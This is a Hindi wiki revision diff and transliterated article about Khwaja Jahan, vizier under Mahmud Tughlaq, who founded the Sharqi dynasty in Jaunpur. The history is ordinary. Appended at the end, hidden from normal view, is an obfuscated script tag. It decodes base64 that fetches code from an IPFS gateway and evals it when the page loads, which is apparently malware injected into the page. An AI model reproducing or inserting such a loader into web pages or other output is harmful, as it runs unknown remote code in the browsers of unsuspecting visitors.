Difference between revisions of "ख़्वाजा जहान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*'''ख़्वाजा जहान''' ने जौनपुर में शर्की वंश की स्थापना क...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "हुयी " to "हुई ")
 
(5 intermediate revisions by one other user not shown)
Line 1: Line 1:
*'''ख़्वाजा जहान''' ने जौनपुर में शर्की वंश की स्थापना की थी।
+
'''ख़्वाजा जहान''' ने [[जौनपुर]] में [[शर्की वंश]] की स्थापना की थी। वह [[फ़िरोज़शाह तुग़लक़]] के पुत्र [[महमूद तुग़लक]] के दरबार में वज़ीर के पद पर नियुक्त था।
  
*यह [[फ़िरोज़शाह तुग़लक़]] के पुत्र [[महमूदशाह तुग़लक]] के दरबार में वज़ीर के पद पर नियुक्त था।
 
 
*1394 ई. में महमूद ने अपने वज़ीर 'ख़्वाजा जहान' को 'मलिक-उस-शर्क' (पूर्व का स्वामी) की उपाधि प्रदान की।
 
*1394 ई. में महमूद ने अपने वज़ीर 'ख़्वाजा जहान' को 'मलिक-उस-शर्क' (पूर्व का स्वामी) की उपाधि प्रदान की।
 
*ख़्वाजा जहान ने [[दिल्ली]] पर हुए [[तैमूर]] के आक्रमण के कारण व्याप्त अस्थिरता का लाभ उठा कर स्वतन्त्र [[शर्की वंश]] की नींव डाली।
 
*ख़्वाजा जहान ने [[दिल्ली]] पर हुए [[तैमूर]] के आक्रमण के कारण व्याप्त अस्थिरता का लाभ उठा कर स्वतन्त्र [[शर्की वंश]] की नींव डाली।
 
*इसने कभी सुल्तान की उपाधि धारण नहीं की।
 
*इसने कभी सुल्तान की उपाधि धारण नहीं की।
 
*1399 ई. में ख़्वाजा जहान की मृत्यु हो गई थी।
 
*1399 ई. में ख़्वाजा जहान की मृत्यु हो गई थी।
*उसके राज्य की सीमाएँ 'कोल', '[[सम्भल]]' तथा 'रापरी' तक फैली हुयी थीं।
+
*उसके राज्य की सीमाएँ 'कोल', '[[सम्भल]]' तथा '[[रापरी]]' तक फैली हुई थीं।
*उसने 'तिरहुत' तथा '[[दोआब]]' के साथ-साथ [[बिहार]] पर भी प्रभुत्व स्थापित किया।
+
*उसने '[[तिरहुत]]' तथा '[[दोआब]]' के साथ-साथ [[बिहार]] पर भी प्रभुत्व स्थापित किया।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{शर्की वंश}}
 
{{भारत के राजवंश}}
 
{{भारत के राजवंश}}
 
{{शर्की वंश}}
 
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:शर्की वंश]]
 
[[Category:शर्की वंश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:41, 7 November 2017

khvaja jahan ne jaunapur mean sharki vansh ki sthapana ki thi. vah firozashah tugalaq ke putr mahamood tugalak ke darabar mean vazir ke pad par niyukt tha.

  • 1394 ee. mean mahamood ne apane vazir 'khvaja jahan' ko 'malik-us-shark' (poorv ka svami) ki upadhi pradan ki.
  • khvaja jahan ne dilli par hue taimoor ke akraman ke karan vyapt asthirata ka labh utha kar svatantr sharki vansh ki nianv dali.
  • isane kabhi sultan ki upadhi dharan nahian ki.
  • 1399 ee. mean khvaja jahan ki mrityu ho gee thi.
  • usake rajy ki simaean 'kol', 'sambhal' tatha 'rapari' tak phaili huee thian.
  • usane 'tirahut' tatha 'doab' ke sath-sath bihar par bhi prabhutv sthapit kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>